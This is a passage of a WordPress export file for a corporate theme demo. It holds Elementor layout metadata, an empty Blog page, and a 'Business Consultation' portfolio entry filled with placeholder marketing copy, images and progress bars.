							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:7;s:19:"_inline_size_tablet";i:6;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"heading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:4;s:11:"header_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:2;s:3:"gap";i:3;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:3;s:7:"padding";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:2;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:2:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=768</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>768</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[770]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consultation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/</link>
		<pubDate>Fri, 11 Sep 2020 07:26:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=773</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>773</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:26:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:26:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consultation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3eb71c6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"40279fc","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"f75ccb2","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3fdd108","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"31adc79","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"a1676c3","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"925bd17","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"98d8bcd","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4516c47","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3b7b92a","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c389ea2","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"86fc555","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2bed14d","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f07866b","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"14874f9","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"03b8867","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"47f5968","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"edf6855","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"cc8f547","elType":"section","settings":[],"elements":[{"id":"86a85ef","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3d96eee","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"93302a5","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"b259223","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"508b36e","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"4b83b55","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d618cf9","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"cba3b0a","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4b4ab4a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f183cae","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"9f10d44","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c3d63b5","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fd40b34","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"41cdbaf","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"43d605f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"3554066","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"c17c256","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"7251310","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bdc9641","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"53d3233","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"4a87234","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"3790d85","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"97bebdd","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"8c1ba05","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1218]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[778]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_wh]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"